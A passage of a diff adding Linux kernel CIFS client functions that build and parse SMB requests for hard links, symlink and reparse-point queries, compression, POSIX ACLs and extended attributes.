++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->FileName, toName,
++					      PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++
++	} else {
++		name_len = copy_path_name(pSMB->FileName, toName);
++	}
++	params = 6 + name_len;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)pSMB + offset + 4;
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len_target =
++		    cifsConvertToUTF16((__le16 *) data_offset, fromName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len_target++;	/* trailing null */
++		name_len_target *= 2;
++	} else {
++		name_len_target = copy_path_name(data_offset, fromName);
++	}
++
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max on data count below from sess*/
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + name_len_target;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->DataCount = cpu_to_le16(name_len_target);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_HLINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetPathInfo (hard link) = %d\n",
++			 rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto createHardLinkRetry;
++
++	return rc;
++}
++
++int
++CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *from_name, const char *to_name,
++		   struct cifs_sb_info *cifs_sb)
++{
++	int rc = 0;
++	NT_RENAME_REQ *pSMB = NULL;
++	RENAME_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len, name_len2;
++	__u16 count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSCreateHardLink\n");
++winCreateHardLinkRetry:
++
++	rc = smb_init(SMB_COM_NT_RENAME, 4, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
++			ATTR_DIRECTORY);
++	pSMB->Flags = cpu_to_le16(CREATE_HARD_LINK);
++	pSMB->ClusterCount = 0;
++
++	pSMB->BufferFormat = 0x04;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->OldFileName, from_name,
++				       PATH_MAX, cifs_sb->local_nls, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++
++		/* protocol specifies ASCII buffer format (0x04) for unicode */
++		pSMB->OldFileName[name_len] = 0x04;
++		pSMB->OldFileName[name_len + 1] = 0x00; /* pad */
++		name_len2 =
++		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
++				       to_name, PATH_MAX, cifs_sb->local_nls,
++				       remap);
++		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
++		name_len2 *= 2;	/* convert to bytes */
++	} else {
++		name_len = copy_path_name(pSMB->OldFileName, from_name);
++		pSMB->OldFileName[name_len] = 0x04;	/* 2nd buffer format */
++		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
++		name_len2++;	/* signature byte */
++	}
++
++	count = 1 /* string type byte */  + name_len + name_len2;
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in hard link (NT rename) = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto winCreateHardLinkRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
++			const unsigned char *searchName, char **symlinkinfo,
++			const struct nls_table *nls_codepage, int remap)
++{
++/* SMB_QUERY_FILE_UNIX_LINK */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++	char *data_start;
++
++	cifs_dbg(FYI, "In QPathSymLinkInfo (Unix) for path %s\n", searchName);
++
++querySymLinkRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   searchName, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_LINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QuerySymLinkInfo = %d\n", rc);
++	} else {
++		/* decode response */
++
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			rc = -EIO;
++		else {
++			bool is_unicode;
++			u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++
++			data_start = ((char *) &pSMBr->hdr.Protocol) +
++					   le16_to_cpu(pSMBr->t2.DataOffset);
++
++			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++				is_unicode = true;
++			else
++				is_unicode = false;
++
++			/* BB FIXME investigate remapping reserved chars here */
++			*symlinkinfo = cifs_strndup_from_utf16(data_start,
++					count, is_unicode, nls_codepage);
++			if (!*symlinkinfo)
++				rc = -ENOMEM;
++		}
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto querySymLinkRetry;
++	return rc;
++}
++
++/*
++ *	Recent Windows versions now create symlinks more frequently
++ *	and they use the "reparse point" mechanism below.  We can of course
++ *	do symlinks nicely to Samba and other servers which support the
++ *	CIFS Unix Extensions and we can also do SFU symlinks and "client only"
++ *	"MF" symlinks optionally, but for recent Windows we really need to
++ *	reenable the code below and fix the cifs_symlink callers to handle this.
++ *	In the interim this code has been moved to its own config option so
++ *	it is not compiled in by default until callers fixed up and more tested.
++ */
++int
++CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
++		    __u16 fid, char **symlinkinfo,
++		    const struct nls_table *nls_codepage)
++{
++	int rc = 0;
++	int bytes_returned;
++	struct smb_com_transaction_ioctl_req *pSMB;
++	struct smb_com_transaction_ioctl_rsp *pSMBr;
++	bool is_unicode;
++	unsigned int sub_len;
++	char *sub_start;
++	struct reparse_symlink_data *reparse_buf;
++	struct reparse_posix_data *posix_buf;
++	__u32 data_offset, data_count;
++	char *end_of_smb;
++
++	cifs_dbg(FYI, "In Windows reparse style QueryLink for fid %u\n", fid);
++	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->TotalParameterCount = 0 ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le32(2);
++	/* BB find exact data count max from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->MaxSetupCount = 4;
++	pSMB->Reserved = 0;
++	pSMB->ParameterOffset = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 4;
++	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->FunctionCode = cpu_to_le32(FSCTL_GET_REPARSE_POINT);
++	pSMB->IsFsctl = 1; /* FSCTL */
++	pSMB->IsRootFlag = 0;
++	pSMB->Fid = fid; /* file handle always le */
++	pSMB->ByteCount = 0;
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QueryReparseLinkInfo = %d\n", rc);
++		goto qreparse_out;
++	}
++
++	data_offset = le32_to_cpu(pSMBr->DataOffset);
++	data_count = le32_to_cpu(pSMBr->DataCount);
++	if (get_bcc(&pSMBr->hdr) < 2 || data_offset > 512) {
++		/* BB also check enough total bytes returned */
++		rc = -EIO;	/* bad smb */
++		goto qreparse_out;
++	}
++	if (!data_count || (data_count > 2048)) {
++		rc = -EIO;
++		cifs_dbg(FYI, "Invalid return data count on get reparse info ioctl\n");
++		goto qreparse_out;
++	}
++	end_of_smb = 2 + get_bcc(&pSMBr->hdr) + (char *)&pSMBr->ByteCount;
++	reparse_buf = (struct reparse_symlink_data *)
++				((char *)&pSMBr->hdr.Protocol + data_offset);
++	if ((char *)reparse_buf >= end_of_smb) {
++		rc = -EIO;
++		goto qreparse_out;
++	}
++	if (reparse_buf->ReparseTag == cpu_to_le32(IO_REPARSE_TAG_NFS)) {
++		cifs_dbg(FYI, "NFS style reparse tag\n");
++		posix_buf =  (struct reparse_posix_data *)reparse_buf;
++
++		if (posix_buf->InodeType != cpu_to_le64(NFS_SPECFILE_LNK)) {
++			cifs_dbg(FYI, "unsupported file type 0x%llx\n",
++				 le64_to_cpu(posix_buf->InodeType));
++			rc = -EOPNOTSUPP;
++			goto qreparse_out;
++		}
++		is_unicode = true;
++		sub_len = le16_to_cpu(reparse_buf->ReparseDataLength);
++		if (posix_buf->PathBuffer + sub_len > end_of_smb) {
++			cifs_dbg(FYI, "reparse buf beyond SMB\n");
++			rc = -EIO;
++			goto qreparse_out;
++		}
++		*symlinkinfo = cifs_strndup_from_utf16(posix_buf->PathBuffer,
++				sub_len, is_unicode, nls_codepage);
++		goto qreparse_out;
++	} else if (reparse_buf->ReparseTag !=
++			cpu_to_le32(IO_REPARSE_TAG_SYMLINK)) {
++		rc = -EOPNOTSUPP;
++		goto qreparse_out;
++	}
++
++	/* Reparse tag is NTFS symlink */
++	sub_start = le16_to_cpu(reparse_buf->SubstituteNameOffset) +
++				reparse_buf->PathBuffer;
++	sub_len = le16_to_cpu(reparse_buf->SubstituteNameLength);
++	if (sub_start + sub_len > end_of_smb) {
++		cifs_dbg(FYI, "reparse buf beyond SMB\n");
++		rc = -EIO;
++		goto qreparse_out;
++	}
++	if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++		is_unicode = true;
++	else
++		is_unicode = false;
++
++	/* BB FIXME investigate remapping reserved chars here */
++	*symlinkinfo = cifs_strndup_from_utf16(sub_start, sub_len, is_unicode,
++					       nls_codepage);
++	if (!*symlinkinfo)
++		rc = -ENOMEM;
++qreparse_out:
++	cifs_buf_release(pSMB);
++
++	/*
++	 * Note: On -EAGAIN error only caller can retry on handle based calls
++	 * since file handle passed in no longer valid.
++	 */
++	return rc;
++}
++
++int
++CIFSSMB_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		    __u16 fid)
++{
++	int rc = 0;
++	int bytes_returned;
++	struct smb_com_transaction_compr_ioctl_req *pSMB;
++	struct smb_com_transaction_ioctl_rsp *pSMBr;
++
++	cifs_dbg(FYI, "Set compression for %u\n", fid);
++	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->compression_state = cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
++
++	pSMB->TotalParameterCount = 0;
++	pSMB->TotalDataCount = cpu_to_le32(2);
++	pSMB->MaxParameterCount = 0;
++	pSMB->MaxDataCount = 0;
++	pSMB->MaxSetupCount = 4;
++	pSMB->Reserved = 0;
++	pSMB->ParameterOffset = 0;
++	pSMB->DataCount = cpu_to_le32(2);
++	pSMB->DataOffset =
++		cpu_to_le32(offsetof(struct smb_com_transaction_compr_ioctl_req,
++				compression_state) - 4);  /* 84 */
++	pSMB->SetupCount = 4;
++	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
++	pSMB->ParameterCount = 0;
++	pSMB->FunctionCode = cpu_to_le32(FSCTL_SET_COMPRESSION);
++	pSMB->IsFsctl = 1; /* FSCTL */
++	pSMB->IsRootFlag = 0;
++	pSMB->Fid = fid; /* file handle always le */
++	/* 3 byte pad, followed by 2 byte compress state */
++	pSMB->ByteCount = cpu_to_le16(5);
++	inc_rfc1001_len(pSMB, 5);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetCompression = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	/*
++	 * Note: On -EAGAIN error only caller can retry on handle based calls
++	 * since file handle passed in no longer valid.
++	 */
++	return rc;
++}
++
++
++#ifdef CONFIG_CIFS_POSIX
++
++/*Convert an Access Control Entry from wire format to local POSIX xattr format*/
++static void cifs_convert_ace(struct posix_acl_xattr_entry *ace,
++			     struct cifs_posix_ace *cifs_ace)
++{
++	/* u8 cifs fields do not need le conversion */
++	ace->e_perm = cpu_to_le16(cifs_ace->cifs_e_perm);
++	ace->e_tag  = cpu_to_le16(cifs_ace->cifs_e_tag);
++	ace->e_id   = cpu_to_le32(le64_to_cpu(cifs_ace->cifs_uid));
++/*
++	cifs_dbg(FYI, "perm %d tag %d id %d\n",
++		 ace->e_perm, ace->e_tag, ace->e_id);
++*/
++
++	return;
++}
++
++/* Convert ACL from CIFS POSIX wire format to local Linux POSIX ACL xattr */
++static int cifs_copy_posix_acl(char *trgt, char *src, const int buflen,
++			       const int acl_type, const int size_of_data_area)
++{
++	int size =  0;
++	int i;
++	__u16 count;
++	struct cifs_posix_ace *pACE;
++	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)src;
++	struct posix_acl_xattr_header *local_acl = (void *)trgt;
++
++	if (le16_to_cpu(cifs_acl->version) != CIFS_ACL_VERSION)
++		return -EOPNOTSUPP;
++
++	if (acl_type == ACL_TYPE_ACCESS) {
++		count = le16_to_cpu(cifs_acl->access_entry_count);
++		pACE = &cifs_acl->ace_array[0];
++		size = sizeof(struct cifs_posix_acl);
++		size += sizeof(struct cifs_posix_ace) * count;
++		/* check if we would go beyond end of SMB */
++		if (size_of_data_area < size) {
++			cifs_dbg(FYI, "bad CIFS POSIX ACL size %d vs. %d\n",
++				 size_of_data_area, size);
++			return -EINVAL;
++		}
++	} else if (acl_type == ACL_TYPE_DEFAULT) {
++		count = le16_to_cpu(cifs_acl->access_entry_count);
++		size = sizeof(struct cifs_posix_acl);
++		size += sizeof(struct cifs_posix_ace) * count;
++/* skip past access ACEs to get to default ACEs */
++		pACE = &cifs_acl->ace_array[count];
++		count = le16_to_cpu(cifs_acl->default_entry_count);
++		size += sizeof(struct cifs_posix_ace) * count;
++		/* check if we would go beyond end of SMB */
++		if (size_of_data_area < size)
++			return -EINVAL;
++	} else {
++		/* illegal type */
++		return -EINVAL;
++	}
++
++	size = posix_acl_xattr_size(count);
++	if ((buflen == 0) || (local_acl == NULL)) {
++		/* used to query ACL EA size */
++	} else if (size > buflen) {
++		return -ERANGE;
++	} else /* buffer big enough */ {
++		struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
++
++		local_acl->a_version = cpu_to_le32(POSIX_ACL_XATTR_VERSION);
++		for (i = 0; i < count ; i++) {
++			cifs_convert_ace(&ace[i], pACE);
++			pACE++;
++		}
++	}
++	return size;
++}
++
++static void convert_ace_to_cifs_ace(struct cifs_posix_ace *cifs_ace,
++				     const struct posix_acl_xattr_entry *local_ace)
++{
++	cifs_ace->cifs_e_perm = le16_to_cpu(local_ace->e_perm);
++	cifs_ace->cifs_e_tag =  le16_to_cpu(local_ace->e_tag);
++	/* BB is there a better way to handle the large uid? */
++	if (local_ace->e_id == cpu_to_le32(-1)) {
++	/* Probably no need to le convert -1 on any arch but can not hurt */
++		cifs_ace->cifs_uid = cpu_to_le64(-1);
++	} else
++		cifs_ace->cifs_uid = cpu_to_le64(le32_to_cpu(local_ace->e_id));
++/*
++	cifs_dbg(FYI, "perm %d tag %d id %d\n",
++		 ace->e_perm, ace->e_tag, ace->e_id);
++*/
++}
++
++/* Convert ACL from local Linux POSIX xattr to CIFS POSIX ACL wire format */
++static __u16 ACL_to_cifs_posix(char *parm_data, const char *pACL,
++			       const int buflen, const int acl_type)
++{
++	__u16 rc = 0;
++	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)parm_data;
++	struct posix_acl_xattr_header *local_acl = (void *)pACL;
++	struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
++	int count;
++	int i;
++
++	if ((buflen == 0) || (pACL == NULL) || (cifs_acl == NULL))
++		return 0;
++
++	count = posix_acl_xattr_count((size_t)buflen);
++	cifs_dbg(FYI, "setting acl with %d entries from buf of length %d and version of %d\n",
++		 count, buflen, le32_to_cpu(local_acl->a_version));
++	if (le32_to_cpu(local_acl->a_version) != 2) {
++		cifs_dbg(FYI, "unknown POSIX ACL version %d\n",
++			 le32_to_cpu(local_acl->a_version));
++		return 0;
++	}
++	cifs_acl->version = cpu_to_le16(1);
++	if (acl_type == ACL_TYPE_ACCESS) {
++		cifs_acl->access_entry_count = cpu_to_le16(count);
++		cifs_acl->default_entry_count = cpu_to_le16(0xFFFF);
++	} else if (acl_type == ACL_TYPE_DEFAULT) {
++		cifs_acl->default_entry_count = cpu_to_le16(count);
++		cifs_acl->access_entry_count = cpu_to_le16(0xFFFF);
++	} else {
++		cifs_dbg(FYI, "unknown ACL type %d\n", acl_type);
++		return 0;
++	}
++	for (i = 0; i < count; i++)
++		convert_ace_to_cifs_ace(&cifs_acl->ace_array[i], &ace[i]);
++	if (rc == 0) {
++		rc = (__u16)(count * sizeof(struct cifs_posix_ace));
++		rc += sizeof(struct cifs_posix_acl);
++		/* BB add check to make sure ACL does not overflow SMB */
++	}
++	return rc;
++}
++
++int
++CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		   const unsigned char *searchName,
++		   char *acl_inf, const int buflen, const int acl_type,
++		   const struct nls_table *nls_codepage, int remap)
++{
++/* SMB_QUERY_POSIX_ACL */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In GetPosixACL (Unix) for path %s\n", searchName);
++
++queryAclRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   searchName, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++		pSMB->FileName[name_len] = 0;
++		pSMB->FileName[name_len+1] = 0;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(
++		offsetof(struct smb_com_transaction2_qpi_req,
++			 InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_ACL);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in Query POSIX ACL = %d\n", rc);
++	} else {
++		/* decode response */
++
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++			rc = cifs_copy_posix_acl(acl_inf,
++				(char *)&pSMBr->hdr.Protocol+data_offset,
++				buflen, acl_type, count);
++		}
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto queryAclRetry;
++	return rc;
++}
++
++int
++CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		   const unsigned char *fileName,
++		   const char *local_acl, const int buflen,
++		   const int acl_type,
++		   const struct nls_table *nls_codepage, int remap)
++{
++	struct smb_com_transaction2_spi_req *pSMB = NULL;
++	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
++	char *parm_data;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count, data_count, param_offset, offset;
++
++	cifs_dbg(FYI, "In SetPosixACL (Unix) for path %s\n", fileName);
++setAclRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++					   PATH_MAX, nls_codepage, remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++	params = 6 + name_len;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB size from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	parm_data = ((char *) &pSMB->hdr.Protocol) + offset;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++
++	/* convert to on the wire format for POSIX ACL */
++	data_count = ACL_to_cifs_posix(parm_data, local_acl, buflen, acl_type);
++
++	if (data_count == 0) {
++		rc = -EOPNOTSUPP;
++		goto setACLerrorExit;
++	}
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_ACL);
++	byte_count = 3 /* pad */  + params + data_count;
++	pSMB->DataCount = cpu_to_le16(data_count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "Set POSIX ACL returned %d\n", rc);
++
++setACLerrorExit:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto setAclRetry;
++	return rc;
++}
++
++int
++CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
++	       const int netfid, __u64 *pExtAttrBits, __u64 *pMask)
++{
++	int rc = 0;
++	struct smb_t2_qfi_req *pSMB = NULL;
++	struct smb_t2_qfi_rsp *pSMBr = NULL;
++	int bytes_returned;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In GetExtAttr\n");
++	if (tcon == NULL)
++		return -ENODEV;
++
++GetExtAttrRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2 /* level */ + 2 /* fid */;
++	pSMB->t2.TotalDataCount = 0;
++	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->t2.MaxDataCount = cpu_to_le16(4000);
++	pSMB->t2.MaxSetupCount = 0;
++	pSMB->t2.Reserved = 0;
++	pSMB->t2.Flags = 0;
++	pSMB->t2.Timeout = 0;
++	pSMB->t2.Reserved2 = 0;
++	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
++					       Fid) - 4);
++	pSMB->t2.DataCount = 0;
++	pSMB->t2.DataOffset = 0;
++	pSMB->t2.SetupCount = 1;
++	pSMB->t2.Reserved3 = 0;
++	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
++	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_ATTR_FLAGS);
++	pSMB->Pad = 0;
++	pSMB->Fid = netfid;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "error %d in GetExtAttr\n", rc);
++	} else {
++		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			/* If rc should we check for EOPNOSUPP and
++			   disable the srvino flag? or in caller? */
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++			struct file_chattr_info *pfinfo;
++
++			if (count != 16) {
++				cifs_dbg(FYI, "Invalid size ret in GetExtAttr\n");
++				rc = -EIO;
++				goto GetExtAttrOut;
++			}
++			pfinfo = (struct file_chattr_info *)
++				 (data_offset + (char *) &pSMBr->hdr.Protocol);
++			*pExtAttrBits = le64_to_cpu(pfinfo->mode);
++			*pMask = le64_to_cpu(pfinfo->mask);
++		}
++	}
++GetExtAttrOut:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
